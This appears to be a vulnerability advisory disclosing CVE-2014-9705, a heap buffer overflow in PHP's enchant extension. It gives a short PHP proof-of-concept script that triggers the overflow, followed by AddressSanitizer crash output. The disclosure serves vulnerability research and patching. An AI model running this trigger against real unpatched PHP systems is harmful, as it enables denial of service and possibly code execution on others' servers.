High-Tech Bridge Security Research Lab discovered a remote heap buffer overflow vulnerability in PHP, which can be exploited to cause a denial of service or execute arbitrary code on the target system.

1. Heap Buffer Overflow in PHP: CVE-2014-9705

The vulnerability resides within the enchant_broker_request_dict() function. A remote attacker can overwrite 4 bytes of heap buffer and cause a denial of service or execute arbitrary code on the target system.

PoC

<?php
$tag = ‘en_US’;
$r = enchant_broker_init();
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, ‘one’, $suggs);
$d = enchant_broker_request_dict($r, $tag);
enchant_dict_quick_check($d, ‘one’, $suggs);
$d = enchant_broker_request_dict($r, $tag);
?>

Result:

[Fri Dec 5 13:32:59 2014] Script: ‘/home/symeon/Desktop/dict.php’
---------------------------------------
/h ome/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c(554) : Block 0xb3256a2c status:
Beginning: OK (allocated on /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:554, 4 bytes)
Start: OK
End: Overflown (magic=0x00000034 instead of 0xAF9A0F68)
At least 4 bytes overflown
---------------------------------------
======================== =========================================
==4350== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xaf9a0f78 at pc 0x84ee4e8 bp 0xbffa7a78 sp 0xbffa7a6c
WRITE of size 4 at 0xaf9a0f78 thread T0
#0 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#1 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#2 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#3 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#4 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#5 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#6 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#7 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#8 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#9 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287
#10 0x807d080 in _start ??:?
0xaf9a0f78 is located 248 bytes to the right of 0-byte region [0xaf9a0e80,0xaf9a0e80)
==4350== AddressSanitizer CHECK failed: …/…/…/…/src/libsanitizer/asan/asan_allocator2.cc:216 “((id)) != (0)” (0x0, 0x0)
#0 0xb617d4b2 in _ZdaPvRKSt9nothrow_t ??:?
#1 0xb61860cc in _ZN11__sanitizer11CheckFailedEPKciS1_yy ??:?
#2 0xb616ef1e in ?? ??:0
#3 0xb61836d3 in __asan_unpoison_stack_memory ??:?
#4 0xb6184b7f in __asan_report_error ??:?
#5 0xb617db2e in __asan_report_store4 ??:?
#6 0x84ee4e7 in zif_enchant_broker_request_dict /home/symeon/Desktop/php-5.6.3/ext/enchant/enchant.c:571
#7 0x915c021 in zend_do_fcall_common_helper_SPEC /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:558
#8 0x9175409 in ZEND_DO_FCALL_SPEC_CONST_HANDLER /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:2595
#9 0x915900d in execute_ex /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:363
#10 0x91592b1 in zend_execute /home/symeon/Desktop/php-5.6.3/Zend/zend_vm_execute.h:388
#11 0x9078a4a in zend_execute_scripts /home/symeon/Desktop/php-5.6.3/Zend/zend.c:1344
#12 0x8e43ee9 in php_execute_script /home/symeon/Desktop/php-5.6.3/main/main.c:2584
#13 0x92f5c8d in do_cli /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:994
#14 0x92f8d2f in main /home/symeon/Desktop/php-5.6.3/sapi/cli/php_cli.c:1378
#15 0xb5081a82 in __libc_start_main /build/buildd/eglibc-2.19/csu/libc-start.c:287